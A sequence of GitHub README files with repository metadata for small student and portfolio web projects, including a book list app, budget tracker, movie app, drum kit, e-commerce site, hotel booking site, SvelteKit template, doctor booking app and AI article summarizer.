<a name="readme-top"></a> <div align="center"> <img src="./photo.png" alt="photo" width="80" alt ="photo"/> <img src="./intro.png" alt="logo"/> <br/> <h2><b>Awesome Books project with ES6</b></h2> </div> <div align="center"> <img src="./dist/card3.png" alt="photo" alt ="screenshot"/> </div> # 📗 Table of Contents - [📖 About the Project](#about-project) - [🛠 Built With](#built-with) - [Tech Stack](#tech-stack) - [Key Features](#key-features) - [🚀 Live Demo](#live-demo) - [💻 Getting Started](#getting-started) - [Setup](#setup) - [Prerequisites](#prerequisites) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#triangular_flag_on_post-deployment) - [👥 Authors](#authors) - [🔭 Future Features](#future-features) - [🤝 Contributing](#contributing) - [⭐️ Show your support](#support) - [🙏 Acknowledgements](#acknowledgements) - [❓ FAQ (OPTIONAL)](#faq) - [📝 License](#license) <br> # 📖 Awesome Books <a name="awesome books"></a> > Small web application used to add, list and delete books from the local storage. User adds a book by providing the title and the author and can retrieve it later. Build with JavaScript. <br> ## 🛠 Built With <a name="built-with"></a> - HTML. - CSS. - JavaScript ### Tech Stack <a name="tech-stack"></a> <details> <summary>Client</summary> <ul> <li><a href="https://developer.mozilla.org/en-US/docs/Web/HTML">HTML</a></li> <li><a href="https://developer.mozilla.org/en-US/docs/Web/CSS">CSS</a></li> <li><a href="https://www.javascript.com/">JavaScript</a></li> </ul> </details> <br> ### Key Features <a name="key-features"></a> - Adding Books; - Deleting Books. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🚀 Live Demo <a name="live-demo"></a> >[Live Demo](https://momo-87.github.io/awesome-books-with-ES6/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 💻 Getting Started <a name="getting-started"></a> >To get a local copy up and running, follow these steps. ### Prerequisites 1. Web browser. 2. Code Editor. 3. Git-smc. ### Setup > To clone this repository to your desired folder, run this command: ```sh cd my-folder git clone https://github.com/momo-87/awesome-books-with-ES6.git ``` ### Install >Run this command: ```sh cd my-project npm install ``` ### Usage > To run the project, open index.html using live server extension. ### Run tests >Coming soon <!-- ### Deployment Coming soon --> <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 👥 Author <a name="authors"></a> 👤 Christian Romuald MOMO TONFACK - GitHub: [@githubhandle](https://github.com/Momo-87) - Twitter: [@twitterhandle](https://twitter.com/Momo_yde) - LinkedIn: [LinkedIn](https://www.linkedin.com/in/christian-momo/) <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🔭 Future Features <a name="future-features"></a> - [ ] Editing Books. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🤝 Contributing <a name="contributing"></a> > Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](https://github.com/momo-87/awesome-books-with-ES6/issues). <p align="right">(<a href="#readme-top">back to top</a>)</p> ## ⭐️ Show your support <a name="support"></a> >If you like this project just give it a star ⭐️. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 🙏 Acknowledgments <a name="acknowledgements"></a> >I would like to thank Microverse. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 📝 License <a name="license"></a> >This project is [MIT](./LICENSE) licensed. <p align="right">(<a href="#readme-top">back to top</a>)</p>
Small web application used to add, list and delete books from the local storage. User adds a book by providing the title and the author and can retrieve it later. Build with JavaScript
css,html,javascript
2023-04-30T20:13:54Z
2023-06-09T13:07:06Z
null
2
1
12
1
0
7
null
MIT
JavaScript
Konark-2ez/filthy-cemetery-1257
main
--- ⭐Deployed Link:- https://chipper-salamander-929e38.netlify.app/index.html --- 💻Unique Project Name & logo :- Buget Buddy - <br> <br> ![App Screenshot](https://i.postimg.cc/GtfLQrkD/Budget-Bud.png) --- This is a real-time budget application that allows users to track their expenses and income in real-time. It is designed to be easy to use and provides users with an intuitive interface for managing their finances.This is a collaborative Project from Masai School in the Construct Week With the 5 team members within 5 Days. --- ## 💫Tech Stack **Client:** HTML | CSS | Javascript | Bootsrap | External CSS library **Server:** Node.js | Express.js | MongoDB | PeerJS library | Socket.io | Bcrypt | PassPort | cors | Redis | JWT **github:** To maintain repository and collabration and version control. **VS Code:** To write HTML,CSS and JavaScript code. **Microsoft Edge,Google Chrome & Mozilla Firefox:** To check the functionality and run the code. ## Frontend Part - Home page - Login/Signup - Dashboard - Google OAuth - Github OAuth ## Backend Part - Authentication using JWT - implementation using Socket.io - Node.js - Express.js ## Database - MongoDB - Redis --- ## Features ✨ - HomePage , Dashboard , Navbar, Footer - Real-time expense and income tracking - Intuitive and easy-to-use interface - Budget tracking and analysis - Secure user authentication and data encryption - Sign Up , Login - Multi-currency support --- ## Screenshots 📷 --- # HomePage ![App Screenshot](https://www.linkpicture.com/q/Screenshot-2023-05-13-112915.png) ![App Screenshot](https://www.linkpicture.com/q/Screenshot-2023-05-13-112943.png) ![App Screenshot](https://www.linkpicture.com/q/Screenshot-2023-05-13-113006.png) # Signup | Login ![App Screenshot](https://i.postimg.cc/nV4fSFT1/Screenshot-2023-05-13-113112.png) ![App Screenshot](https://i.postimg.cc/7YZt1wRh/Screenshot-2023-05-13-113132.png) # Dashboard ![App Screenshot](https://i.postimg.cc/cLMhtJ7r/Screenshot-2023-05-13-113305.png) # Crypto ![App Screenshot](https://i.postimg.cc/0NDV5QzW/Screenshot-2023-05-13-113033.png) ![App Screenshot](https://i.postimg.cc/gJf8T9yC/Screenshot-2023-05-13-113401.png) --- ## ✨Collaboraters Names Are :- 1. Konark Chandra Kumar(Team Lead) > - e-Mail: konarkkumar456@gmail.com > - GitHub: https://github.com/Konark-2ez 2. Manideep Peddaboini > - e-Mail: peddaboinimanideep03@gmail.com > - GitHub: https://github.com/Manideep-0164 3. Sumit Kumar Yadav > - e-Mail: sy7985494155@gmail.com > - GitHub: https://github.com/sumit9235 4. Shashwat Mahendra > - e-Mail: shashwatmahender2104@gmail.com > - GitHub: https://github.com/Shashwat2104 5. Abdul Haseeb T K > - e-Mail: haseebshs@gmail.com > - GitHub: https://github.com/haseeb1233 ---- <h1 align="center">✨Thank You✨</h1>
BudgetBuddy is an expense tracker site that helps the user to track his budget with minimum effort.
chartjs,css3,expressjs,html5,javascript,jsonwebtoken,mongodb,mongodb-atlas,nodejs,socket-io
2023-05-03T12:25:32Z
2023-07-23T17:17:37Z
null
6
32
104
0
4
7
null
null
JavaScript
oovillagran/Central-Cinema-Trends
development
<a name="readme-top"></a> <div align="center"> <h1><b>Central Cinema Trends: JavaScript Capstone Project </b></h1> <img src="./src/Images/Capstone.png" alt="Readme Image"> </div> <!-- TABLE OF CONTENTS --> # 📗 Table of Contents - [📗 Table of Contents](#-table-of-contents) - [📖 Central Cinema Trends - JavaScript capstone project - Your API-based webapp](#-central-cinema-trends---javascript-capstone-project---your-api-based-webapp) - [🛠 Built With ](#-built-with-) - [Tech Stack ](#tech-stack-) - [Key Features ](#key-features-) - [🚀 Live Demo ](#-live-demo-) - [💻 Getting Started ](#-getting-started-) - [Prerequisites](#prerequisites) - [Setup](#setup) - [Install](#install) - [Usage](#usage) - [Run tests](#run-tests) - [Deployment](#deployment) - [👥 Authors ](#-authors-) - [🔭 Future Features ](#-future-features-) - [🤝 Contributing ](#-contributing-) - [⭐️ Show your support ](#️-show-your-support-) - [🙏 Acknowledgments ](#-acknowledgments-) - [📝 License ](#-license-) <!-- PROJECT DESCRIPTION --> # 📖 Central Cinema Trends - JavaScript capstone project - Your API-based webapp<a name="about-project"></a> **Central Cinema Trends** is a webapp that shows you the most popular movies. We built this webapp as part of our currently studies at Microverse in the Full-Stack Web Development program. This is our JavaScript capstone project. To Build this web application we use an external API provided by [The Movie DB](https://www.themoviedb.org/). In this web application, users can interact whit it, posting comments and given likes for each movie. To do that, we use the [Involvement API](https://www.notion.so/microverse/Involvement-API-869e60b5ad104603aa6db59e08150270) provided by Microverse. ## 🛠 Built With <a name="built-with"></a> ### Tech Stack <a name="tech-stack"></a> <details> <summary>HTML</summary> <ul> <li>HTML</li> </ul> </details> <details> <summary>CSS</summary> <ul> <li>CSS</li> </ul> </details> <details> <summary>Javascript</summary> <ul> <li>Javascript</li> </ul> </details> <!-- Features --> ### Key Features <a name="key-features"></a> - Use of linters on HTML&CSS&JavaScript project. - Write a correct descriptive README file. - Use of webpack. - Follow GitFlow. - Use of JavaScript to make websites dynamic and build basic single page apps. - Use of ES6 syntax. - Use of ES6 modules. - Use of callbacks and promises. - Apply JavaScript best practices and language style guides in code. - Use AAA pattern for unit tests. - Write units tests for a JavaScript app, and use of Jest tool for these tests.. - Solve simple git conflicts. - Send and receive data from an API. - Use API documentation. - Understand and use JSON. - Make JavaScript code asynchronous. - Perform a code review for a team member. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- LIVE DEMO --> ## 🚀 Live Demo <a name="live-demo"></a> - Here is a [livedemo](https://centralcinematrends.onrender.com/). - Here is a [video](https://drive.google.com/file/d/1UMheuoNDptDJuiILqZK88ZOEy38p4MSx/view?usp=sharing) with the main features of the project we built. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- GETTING STARTED --> ## 💻 Getting Started <a name="getting-started"></a> To get a local copy up and running, follow these steps: ```bash clone this repository into your machine npm start ``` ### Prerequisites In order to run this project you need: - Create a repo on your repositores files. - Clone or make a copy of this repo on your local machine. - Follow GitHub flow. - A carefully reading of this README.md is required. ### Setup Clone this repository to your desired folder: ```bash cd my-folder git clone git@github.com:oovillagran/Capstone-Module2.git ``` ### Install Install this project with: ```bash npm install ``` ### Usage To run the project, you can use your favorite browser. ### Run tests To run tests, execute the following command: ```bash npm test ``` ### Deployment - N/A <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- AUTHORS --> ## 👥 Authors <a name="authors"></a> 👤 **Naan Ahmed Mohammed** - GitHub: [@naanmohammed](https://github.com/naanmohammed) - Twitter: [@_naanahmed](https://twitter.com/twitterhandle) - LinkedIn: [naanahmed](https://linkedin.com/in/naanahmed) 👤 **Oscar Villagran** - GitHub: [@oovillagran](https://github.com/oovillagran) - Twitter: [@oovillagran](https://twitter.com/oovillagran) - LinkedIn: [Oscar Villagran](https://www.linkedin.com/in/oovillagran/) <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- FUTURE FEATURES --> ## 🔭 Future Features <a name="future-features"></a> - [ ] **Make Reservations Options** <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- CONTRIBUTING --> ## 🤝 Contributing <a name="contributing"></a> Contributions, issues, and feature requests are welcome! Feel free to check the [issues page](../../issues/). <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- SUPPORT --> ## ⭐️ Show your support <a name="support"></a> If you like this project feel free to make any comment, all contributions are welcome!. <p align="right">(<a href="#readme-top">back to top</a>)</p> <!-- ACKNOWLEDGEMENTS --> ## 🙏 Acknowledgments <a name="acknowledgements"></a> We would like to thank Microverse comunity. We thank our learning, morning session and standup partners for supporting us. <p align="right">(<a href="#readme-top">back to top</a>)</p> ## 📝 License <a name="license"></a> This project is [MIT](LICENSE.md) licensed. <a href="LICENSE.md"> <p align="right">(<a href="#readme-top">back to top</a>)</p>
Central Cinema Trends is a webapp that shows you the most popular movies at the moment.
css,html5,javascript,api-rest
2023-04-24T19:08:41Z
2023-05-11T21:52:59Z
null
2
21
89
1
1
6
null
MIT
JavaScript
harsh98trivedi/Drum-Kit
master
# Drum Kit ![Drum Kit by Harsh Trivedi](https://raw.github.com/harsh98trivedi/Drum-Kit/master/meta.jpg) This is a simple drum kit web application that allows users to play drums by pressing specific keys on their keyboard. It's a fun project to play around with and can be a great learning tool for those who are new to web development. ### Demo Check out the live demo of the project [here](https://harsh98trivedi.github.io/Drum-Kit/). ### Usage To use the drum kit, simply open the project in your web browser and start pressing the corresponding keys on your keyboard to play the different drum sounds.
The drum kit that will make you want to play all day long.
drum,drum-kit,drumkit,javascript,javascript30,js,js30,wesbos
2023-04-26T17:14:29Z
2023-04-26T17:28:32Z
null
1
0
2
0
0
6
null
null
HTML
AlpayC/Project_Rock_Paper_Scissors
main
# Project - Rock, Scissor, Paper Game like a pirate # ONLY PLAYABLE IN 1920x1080px, actually ;-) ## Table of contents - [Overview](#overview) - [The challenge](#the-challenge) - [Screenshot](#screenshot) - [Links](#links) - [My process](#my-process) - [Built with](#built-with) - [What I learned](#what-i-learned) - [Continued development](#continued-development) ## Overview ### The challenge My challenge was to code the game rock-scissor-paper game - only using javascript, html and css - free design Personal challenge was to make a chibi game with real game sprites and cool pirate character sprites ### Screenshot ![](./screenshot.png) ### Links - Solution URL: [https://alpayc.github.io/Project_Rock_Paper_Scissors/] - Game Character Sprites [https://craftpix.net/freebies/free-2d-pirate-character-sprites/] - GUI assets [https://craftpix.net/freebies/free-jungle-cartoon-2d-game-ui/] - Cartoon Backgrounds [https://craftpix.net/freebies/free-cartoon-forest-game-backgrounds/] - Icon assets [https://www.flaticon.com/free-icons/stop] - Icon assets [https://www.flaticon.com/free-icons/scissors] - Icon assets [https://www.flaticon.com/free-icons/fist] - Sprite Sheet Generator [https://codeshack.io/images-sprite-sheet-generator/] - Sprite to Gif Generator [https://onlinegiftools.com/convert-sprite-sheet-to-gif] ## My process ### Built with - Semantic HTML5 markup - CSS - Grid - Flexbox - ALL Animations with CSS-only and Keyframes in combination with add/remove classlist - Gamelogic build with JS of course - Free Game Assets and images ### What I learned How to build a game with serial and parallel animations. SVGs don't work properly for games, because of the workload of assets. Furthermore, i learned to pause functions with timeouts to time the complete animation. I also learned a lot of the eventListener function of JS. ### Continued development - Want to add splashscreen - Want to add audio for attack, idle, win and lose animation - Responsive Design - Local Storage for Scoreboard - Pause Menu - Keybinds
null
css3,game,game-development,html5,javascript,rock-paper-scissors
2023-05-11T18:02:16Z
2023-05-15T13:10:57Z
null
1
0
11
0
0
6
null
null
JavaScript
azzzrro/projectYara
main
![Logo](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687858584/git/yara/Untitled-1_do4zpu.png) # Yara skinCare Ecomm Welcome to Yara, an online platform that offers a wide range of high-quality skin care products. This repository contains the source code for the Yara website, built using JavaScript, Node.js, and MongoDB. ## Features - User registration and authentication using OTP - Referral programs and Referral bonus - Browse and search for skin care products - View detailed product information and pricing - Add products to the shopping cart and wishlist - Products offers and Coupons - Manage shopping cart and proceed to checkout - Place orders and view order history - Admin panel for managing products, orders, and users - Integration with payment gateway for secure transactions ## Installation To run Yara locally on your machine, follow these steps: - Clone the project ```bash git clone https://github.com/azzzrro/projectYara.git ``` - Go to the project directory ```bash cd projectYara ``` - Install dependencies ```bash npm install ``` - Create a .env file in the root directory of the project and configure the following environment variables: - NB: CLOUD_NAME is the cloudinary cdn details ```bash PORT MONGODB_URL NODEMAILER_USER NODEMAILER_PASS ADMINEMAIL ADMINPASS RAZORPAY_KEY_ID RAZORPAY_KEY_SECRET CLOUD_NAME API_KEY API_SECRET ``` ## Screenshots ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687855699/git/yara/Screenshot_2023-06-27_141242_eanhon.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687855700/git/Screenshot_2023-06-27_141345_pqzqsh.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687856187/git/yara/Screenshot_2023-06-27_141412_xnhr8w.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687859057/git/yara/Screenshot_2023-06-27_141437_prfkf3.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687859206/git/yara/Screenshot_2023-06-27_141456_dcuvcm.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687855700/git/Screenshot_2023-06-27_141549_phiptw.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687855702/git/yara/Screenshot_2023-06-27_141633_ns1dtb.jpg) ![App Screenshot](https://res.cloudinary.com/dmbpxal0o/image/upload/v1687855700/git/yara/Screenshot_2023-06-27_141653_yrr9lu.jpg) ## Tech Stack **Client:** HTML, CSS, JavaScript, Jquery, Bootstrap **Server:** Node, Express, MongoDB, AWS, Nginix ## Contributing Contributions to Yara are always welcome! If you find any bugs or have suggestions for improvements, please open an issue on the GitHub repository. If you'd like to contribute code, you can fork the repository, make your changes, and submit a pull request. Please ensure your contributions align with the project's coding style and follow best practices. Be sure to include relevant tests and clearly describe your changes. ## Feedback If you have any feedback, please reach out to me at helloazzzrro@gmail.com
Yara is an e-commerce project of skin care products built on HTML, CSS, bootstrap, jQuery, and JavaScript for the front end, and Node.js, Express.js, and MongoDB for the backend. It offers a user-friendly interface and an admin panel for easy administration.
css,ecommerce,expressjs,html5,javascript,mongodb,nodejs,bootstrap,jquery
2023-05-13T09:22:28Z
2023-07-27T10:21:01Z
null
1
0
45
0
0
6
null
null
CSS
shivendra-somr/INRClub
main
# fortunate-thunder-4899- This project is a hotel booking website that allows users to search for and book hotels online. The website is intended for anyone looking to book a hotel room, whether for business or leisure. <!-- ************************************** --> Usage --> To use the website, follow these steps: Navigate to the homepage. Provide your credintials and login to the website. Use the search form to enter your desired location, check-in and check-out dates, and number of guests. Browse the list of available hotels and select one to book. Fill out the booking form with your details and payment information. Submit the booking form to confirm your reservation. <!-- ************************************** --> Features--> The hotel booking website includes the following features: Search functionality: Users can search for hotels by location, check-in and check-out dates, and number of guests. Booking form: Users can fill out a booking form with their details and payment information to confirm their reservation. User accounts: Users can create an account to save their booking information and preferences. Payment options: The website supports multiple payment options, including credit card and UPI. <!-- ************************************** --> Technologies Used--> The hotel booking website was built using the following technologies: HTML, CSS, and JavaScript for the frontend. Node.js for the backend. Render.com to create mock API. <!-- ************************************** --> Contributors--> This project is developed by the following contributors: Shivendra Kumar - fp11_037 Gaurav Raj - fp11_060 Badri Vishal Singh - fw26_266 Sohail Alam - fp11_109 Neha Singh - fw25_310
INRClub is intended for anyone looking to book a hotel room, whether for business or leisure.
css3,html5,javascript,netlify,nodejs,render
2023-05-02T17:27:12Z
2023-05-09T13:57:22Z
null
5
19
53
0
3
6
null
null
HTML
MaDrCloudDev/aMaDrOfSvelte
master
# [aMaDrOfSvelte](https://amadrofsvelte.madr.io) ### ***UPDATE:*** I'm waiting for Svelte5/SvelteKit2 to update this project. ## A small, decisive full-stack SvelteKit template stater featuring: Prisma, Planetscale (MySQL), Lucia auth w/ GitHub oAuth, & Tailwind w/ Flowbite components ### aMaDrOfSvelte lets you manage your database, your "server" (serverless functions), your APIs, and and your front-end all from the same the codebase - using the same language - by merely typing a few commands into your terminal #### A modern, contained full-stack template manageable by solo developers --- ## Features - PlanetScale (MySQL) Database. More flexible than NoSQL, but just as easy to use thanks to Prisma - Prisma for ORM, query building, and dead-simple data manipulation. Just type "npx prisma studio" - Lucia auth with oAuth for easy user authentication. GitHub oAuth pre-configued; remove it if you want simple sign-in - SvelteKit for the best frontend developer experience. It just works, and I end up typing half as much code as React - Pre-configured with Tailwind and Flowbite for easy-to-use components. Try the Flowbite components, or remove it and use regular Tailwind - Service-worker and web-manfiest for full PWA compadibility. Edit them to fit your sites constraints - The full-stack template a single developer can manage; all from their front-end - Hosted on Vercel using autodetected serverless functions --- ## Learn SvelteKit! I've added [slug]-based routing to the Blog and Projects route. Now, when you click respective blog and project links, you're taken to a dynamic route based on their ID, which then uses that ID parameter to load in the appropriate data from the database. --- ## Requirements - [PlanetScale](https://planetscale.com/) - [Prisma](https://www.prisma.io/) - [Lucia Auth](https://lucia-auth.com/) - [Vercel](https://vercel.com/) - [Flowbite](https://flowbite-svelte.com/) --- ## Getting Started [Generate](https://github.com/madrclouddev/amadrofsvelte/generate) a new project from this template, update environment variables in your .env: don't have a .env in your root folder? create one! ``` git clone https://github.com/madrclouddev/amadrofsvelte.git amadrofsvelte cd amadrofsvelte nvm i 20 npm i // First get your PlansetScale Prisma connection url from PlanetScale and input it into your .env file // Then set up oAuth for your app on GitHub and input the environment variables into your .env file // App wont work witout generating your prisma client and pushing it to your DB npx prisma generate npx prisma db push // App still wont work, because Projects and Blog routes are looping over empty data tables. Add some data to their tables using Prisma studio npx prisma studio // Add at least one project item and one blog item to the respective tables. The img values in each table refers to a URL npm run dev npm run build ``` --- ## How to Deploy Ensure that all the environment variables in your .env are correct. There's no node-express server here, so you need to host somewhere like Vercel or Netlify, which should automatically turn the SvelteKit server functions into serverless functions. You likely need to override your host's build step; changing it to "npm install && npx prisma generate" rather than simply "npm install". --- ### Notes The "logged in" toast is just something I cobbled together. It will always refire when you visit the homepage (a protected route). I'm not returning any feedback/error for unlogged-in users visistng protected routes (the app simply won't work if you aren't logged in - except for the compoenents route - which is unprotected). I'm looking for a flash notifcation that works with forms and serverless functions. I'll update when I find a suitable solution. It's a work in progress... will add some form of CRUD when I get a chance, probably a guestbook.
A small, decisive full-stack SvelteKit template stater featuring: Prisma, Planetscale (MySQL), Lucia auth w/ GitHub oAuth, & Tailwind w/ Flowbite components
cloudinary,css,css3,html,javascript,planetscale,prisma,serverless,sveltekit,tailwindcss
2023-05-04T22:45:51Z
2024-02-18T04:12:20Z
null
1
0
78
0
0
6
null
MIT
Svelte
akshaychavan010101/Hospital-Booking-App
main
# Find My Doctor ![Logo](https://i.imgur.com/wOQJdCI.png) FindMyDoc is an online appointment booking system designed for healthcare professionals and their patients. It allows patients to search for and book appointments with doctors and other healthcare providers, based on their availability. It also provides features such as appointment notifications, patient profiles, and admin handles making it easier for healthcare providers to manage their patient appointments and care. ## Features - Cross platform - Responsive - Authorization - Authentication - Appointment Booking - Check Slot Availability - Admin Handle - Notifications ## Tech Stack **Framework:** Vite **Client:** React, Chakra-UI, Typescript **Server:** Node, Express **Database:** SQL : freesqldatabase.com , MongoDB : MongoDB Atlas ## Run Locally Clone the project ```bash git clone https://github.com/akshaychavan010101/fast-glass-1638.git ``` Go to the project directory ```bash cd fast-glass-1638 ``` Install dependencies ```bash npm install ``` Start the server ```bash node index.js ``` ## Environment Variables To run this project, you will need to add the following environment variables to your .env file `MONGO_URL` `JWT_SECRET` `SESSION_SECRET` `GOOGLE_CLIENT_ID` `GOOGLE_CLIENT_SECRET` `GITHUB_CLIENT_ID` `GITHUB_CLIENT_SECRET` `PORT` ## API Reference #### Welcome ```http GET /home ``` #### Get | Post | Update | Delete User's ```http GET /user ``` #### Get | Post | Update | Delete Appointment's ```http GET /appointments ``` #### Get | Post | Update | Delete Doctor's ```http GET /doctors ``` ## Demo ### Live at `https://findmydoctorapp.netlify.app` ### Backend URL `https://jittery-shirt-tuna.cyclic.app` ## Screenshots ![App Screenshot](https://i.imgur.com/eOY9Di5.png) ![App Screenshot](https://i.imgur.com/h5lr6GB.png) ![App Screenshot](https://i.imgur.com/CuzQ1iY.png) ## System Architecture ![SD image](https://i.imgur.com/oJW6QQe.jpeg) ## ER Diagram ![ER](https://i.imgur.com/1Xp2fEl.png) ## Workflow ![workflow](https://i.imgur.com/XAa3M2L.jpeg) ## Authors - [@Akshay Chavan](https://github.com/akshaychavan010101) - [@Raj Kumar Sen](https://github.com/RAJKUMARSHRIVASH) - [@Sourabh Rajput](https://github.com/Sourabh12321) - [@Gaurav Anand](https://github.com/GauravAnand15) ## Attribution :- Special Thanks to.. flaticon.com freepic pexels getcssscan Chakra-UI Imagur Planetscale Netlify
Findmydoc is a hospital appointment booking system website.
chakra-ui,github-oauth,google-oauth2,mongodb,mysql,react,reactjs,typescript,javascript,vite
2023-04-29T10:22:23Z
2023-05-17T17:53:50Z
null
7
49
150
0
3
6
null
null
TypeScript
sanidhyy/ai-summarizer
main
# Summise - Modern OpenAI GPT-4 Article Summarizer ![Modern OpenAI GPT-4 Article Summarizer](/.github/images/img_main.png "Modern OpenAI GPT-4 Article Summarizer") [![Ask Me Anything!](https://img.shields.io/badge/Ask%20me-anything-1abc9c.svg)](https://github.com/Technical-Shubham-tech "Ask Me Anything!") [![GitHub license](https://img.shields.io/github/license/Technical-Shubham-tech/ai-summarizer)](https://github.com/Technical-Shubham-tech/ai-summarizer/blob/main/LICENSE.md "GitHub license") [![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green.svg)](https://github.com/Technical-Shubham-tech/ai-summarizer/commits/main "Maintenance") [![GitHub branches](https://badgen.net/github/branches/Technical-Shubham-tech/ai-summarizer)](https://github.com/Technical-Shubham-tech/ai-summarizer/branches "GitHub branches") [![Github commits](https://badgen.net/github/commits/Technical-Shubham-tech/ai-summarizer/main)](https://github.com/Technical-Shubham-tech/ai-summarizer/commits "Github commits") [![Netlify Status](https://api.netlify.com/api/v1/badges/4b406197-21d8-4e96-9fdd-52c782540f0e/deploy-status)](https://summise.netlify.app/ "Netlify Status") [![GitHub issues](https://img.shields.io/github/issues/Technical-Shubham-tech/ai-summarizer)](https://github.com/Technical-Shubham-tech/ai-summarizer/issues "GitHub issues") [![GitHub pull requests](https://img.shields.io/github/issues-pr/Technical-Shubham-tech/ai-summarizer)](https://github.com/Technical-Shubham-tech/ai-summarizer/pulls "GitHub pull requests") ## ⚠️ Before you start 1. Make sure **Git** and **NodeJS** is installed. 2. Clone this repository to your local computer. 3. Create .env file in root folder. 4. Contents of **.env**: ``` VITE_RAPIDAPI_ARTICLE_KEY=XXXXXXXXXXXXXXXXXXXXXXX ``` 5. Now, to setup Article Summarizer API, go to [Rapid API Website](https://rapidapi.com/) and create an account. 6. Enable this API to fetch music data: [API: Article Extractor and Summarizer by Anthony](https://rapidapi.com/restyler/api/article-extractor-and-summarizer "API: Article Extractor and Summarizer by Anthony"). ![Copy API Key](/.github/images/step_api.png "Copy API Key") 7. After enabling you can get your API Keys and paste them in `.env` file in `VITE_RAPIDAPI_ARTICLE_KEY`. 8. Open terminal and run `npm install` or `yarn install` in root folder to install necessary packages. 9. Now app is fully configured :+1: and you can start using this app using `npm run dev` or `yarn dev`. **NOTE:** Make sure you don't share these keys publicaly. ## :camera: Screenshots: ![Modern UI/UX](/.github/images/img1.png "Modern UI/UX") ![Generate Article Summary](/.github/images/img2.png "Generate Article Summary") ![Chat GPT-4 AI Model](/.github/images/img3.png "Chat GPT-4 AI Model") ## :gear: Built with [![JavaScript](https://skillicons.dev/icons?i=js)](https://developer.mozilla.org/en-US/docs/Web/JavaScript "JavaScript") [![React JS](https://skillicons.dev/icons?i=react)](https://react.dev/ "React JS") [![Tailwind CSS](https://skillicons.dev/icons?i=tailwind)](https://tailwindcss.com/ "Tailwind CSS") [![Vite](https://skillicons.dev/icons?i=vite)](https://vitejs.dev/ "Vite") ## :wrench: Stats [![Stats for this App](/.github/images/stats.svg)](https://pagespeed.web.dev/ "Stats for this App") ## :raised_hands: Contribute You might encounter some bugs while using this app. You are more than welcome to contribute. Just submit changes via pull request and I will review them before merging. Make sure you follow community guidelines. ## Buy Me a Coffee 🍺 [<img src="https://img.shields.io/badge/Buy_Me_A_Coffee-FFDD00?style=for-the-badge&logo=buy-me-a-coffee&logoColor=black" width="200" />](https://www.buymeacoffee.com/sanidhy "Buy me a Coffee") ## :rocket: Follow Me [![GitHub followers](https://img.shields.io/github/followers/Technical-Shubham-tech?style=social&label=Follow&maxAge=2592000)](https://github.com/Technical-Shubham-tech "Follow Me") [![Twitter](https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Ftwitter.com%2FTechnicalShubam)](https://twitter.com/intent/tweet?text=Wow:&url=https%3A%2F%2Fgithub.com%2FTechnical-Shubham-tech%2Fmedical-chat-app "Tweet") [![YouTube](https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white)](https://www.youtube.com/channel/UCNAz_hUVBG2ZUN8TVm0bmYw "Subscribe my Channel") ## :star: Give A Star You can also give this repository a star to show more people and they can use this repository. ## :books: Available Scripts In the project directory, you can run: ### `yarn run dev` Runs the app in the development mode.\ Open [http://localhost:3000](http://localhost:3000) to view it in your browser. The page will reload when you make changes.\ You may also see any lint errors in the console. ### `yarn test` Launches the test runner in the interactive watch mode.\ See the section about [running tests](https://facebook.github.io/create-react-app/docs/running-tests) for more information. ### `yarn run build` Builds the app for production to the `dist` folder.\ It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes.\ Your app is ready to be deployed! See the section about [deployment](https://facebook.github.io/create-react-app/docs/deployment) for more information. ### `yarn eject` **Note: this is a one-way operation. Once you `eject`, you can't go back!** If you aren't satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you're on your own. You don't have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn't feel obligated to use this feature. However we understand that this tool wouldn't be useful if you couldn't customize it when you are ready for it. ## :page_with_curl: Learn More You can learn more in the [Create React App documentation](https://facebook.github.io/create-react-app/docs/getting-started). To learn React, check out the [React documentation](https://reactjs.org/). ### Code Splitting This section has moved here: [https://facebook.github.io/create-react-app/docs/code-splitting](https://facebook.github.io/create-react-app/docs/code-splitting) ### Analyzing the Bundle Size This section has moved here: [https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size](https://facebook.github.io/create-react-app/docs/analyzing-the-bundle-size) ### Making a Progressive Web App This section has moved here: [https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app](https://facebook.github.io/create-react-app/docs/making-a-progressive-web-app) ### Advanced Configuration This section has moved here: [https://facebook.github.io/create-react-app/docs/advanced-configuration](https://facebook.github.io/create-react-app/docs/advanced-configuration) ### Deployment This section has moved here: [https://facebook.github.io/create-react-app/docs/deployment](https://facebook.github.io/create-react-app/docs/deployment) ### `yarn run build` fails to minify This section has moved here: [https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify](https://facebook.github.io/create-react-app/docs/troubleshooting#npm-run-build-fails-to-minify)
